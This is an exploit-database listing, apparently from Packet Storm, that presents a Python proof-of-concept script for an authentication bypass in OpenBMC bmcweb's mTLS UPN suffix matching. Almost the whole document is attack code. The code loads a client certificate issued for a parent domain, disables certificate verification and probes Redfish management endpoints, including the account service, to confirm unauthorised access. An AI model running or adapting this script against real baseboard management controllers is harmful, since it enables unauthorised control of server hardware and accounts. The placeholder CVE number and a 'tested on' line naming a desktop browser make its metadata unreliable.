Share
## https://sploitus.com/exploit?id=PACKETSTORM:225451
==================================================================================================================================
| # Title : OpenBMC bmcweb AUTH-F6 mTLS UPN Suffix Authentication bypass via parent-domain certificate |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://github.com/openbmc |
==================================================================================================================================
[+] Summary : a Python PoC-style security test script for OpenBMC mTLS authentication issue labeled βAUTH-F6 UPN suffix bypassβ.
[+] POC :
#!/usr/bin/env python3
import argparse
import ssl
import sys
import requests
import urllib3
from urllib.parse import urljoin
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class BMCWebAuthBypass:
def __init__(self, target, port=443, use_ssl=True, verbose=False):
self.target = target
self.port = port
self.use_ssl = use_ssl
self.verbose = verbose
self.base_url = f"{'https' if use_ssl else 'http'}://{target}:{port}"
self.session = requests.Session()
self.session.verify = False
def log(self, msg, level="INFO"):
colors = {
"SUCCESS": "\033[92m[+]\033[0m",
"ERROR": "\033[91m[-]\033[0m",
"WARNING": "\033[93m[!]\033[0m",
"INFO": "\033[96m[*]\033[0m"
}
print(f"{colors.get(level, '[*]')} {msg}")
def setup_mtls(self, cert_file, key_file):
"""Setup mTLS with client certificate"""
try:
self.session.cert = (cert_file, key_file)
self.log(f"Loaded client certificate from {cert_file}", "SUCCESS")
return True
except Exception as e:
self.log(f"Failed to load certificate: {e}", "ERROR")
return False
def test_authentication(self):
"""Test if authentication succeeds with the certificate"""
endpoints = [
'/redfish/v1/Systems',
'/redfish/v1/Managers',
'/redfish/v1/SessionService/Sessions',
'/redfish/v1/Chassis',
'/redfish/v1/AccountService/Accounts'
]
for endpoint in endpoints:
url = urljoin(self.base_url, endpoint)
self.log(f"Testing access to {url}")
try:
response = self.session.get(url, timeout=10)
if response.status_code == 200:
self.log(f"SUCCESS! Access granted to {endpoint}", "SUCCESS")
try:
data = response.json()
self.log(f"Response data: {list(data.keys()) if data else 'empty'}")
except:
pass
return True
elif response.status_code == 401:
self.log(f"Access denied to {endpoint} (HTTP 401)")
else:
self.log(f"Response: HTTP {response.status_code}")
except Exception as e:
self.log(f"Error: {e}", "WARNING")
return False
def check_upn_matching(self, upn_email, target_domain=None):
"""Check if UPN matches target domain (vulnerable algorithm)"""
if not target_domain:
target_domain = self.target
if '@' not in upn_email:
self.log(f"Invalid UPN format: {upn_email}", "ERROR")
return False
user_part, upn_domain = upn_email.split('@')
upn_labels = upn_domain.split('.')
target_labels = target_domain.split('.')
self.log(f"UPN domain: {upn_domain}")
self.log(f"Target domain: {target_domain}")
upn_idx = len(upn_labels) - 1
target_idx = len(target_labels) - 1
matching = True
while upn_idx >= 0 and target_idx >= 0:
if upn_labels[upn_idx] != target_labels[target_idx]:
matching = False
break
upn_idx -= 1
target_idx -= 1
result = matching or upn_idx < 0
self.log(f"Vulnerable algorithm result: {result}")
if result:
self.log("Certificate would authenticate for this domain (VULNERABLE)", "WARNING")
else:
self.log("Certificate would NOT authenticate (safe)")
return result
def run(self, cert_file=None, key_file=None, upn_email=None):
"""Main exploit routine"""
self.log(f"Target: {self.base_url}")
if cert_file and key_file:
if not self.setup_mtls(cert_file, key_file):
return False
if self.test_authentication():
self.log("Authentication bypass successful!", "SUCCESS")
return True
else:
self.log("Authentication failed", "ERROR")
elif upn_email:
self.check_upn_matching(upn_email)
return True
else:
self.log("No certificate or UPN provided", "ERROR")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-XXXXX - bmcweb OpenBMC AUTH-F6 mTLS Bypass"
)
parser.add_argument("-t", "--target", required=True, help="Target BMC hostname")
parser.add_argument("-p", "--port", type=int, default=443, help="Port (default: 443)")
parser.add_argument("--cert", help="Client certificate file (PEM)")
parser.add_argument("--key", help="Client key file (PEM)")
parser.add_argument("--upn", help="UPN email to test (e.g., user@com)")
parser.add_argument("--target-domain", help="Target domain for UPN test")
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
args = parser.parse_args()
print("""
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CVE-2026-XXXXX - bmcweb OpenBMC AUTH-F6 mTLS UPN Bypass β
β Authentication Bypass via Parent-Domain Certificate β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
""")
exploit = BMCWebAuthBypass(
target=args.target,
port=args.port,
verbose=args.verbose
)
success = exploit.run(
cert_file=args.cert,
key_file=args.key,
upn_email=args.upn
)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================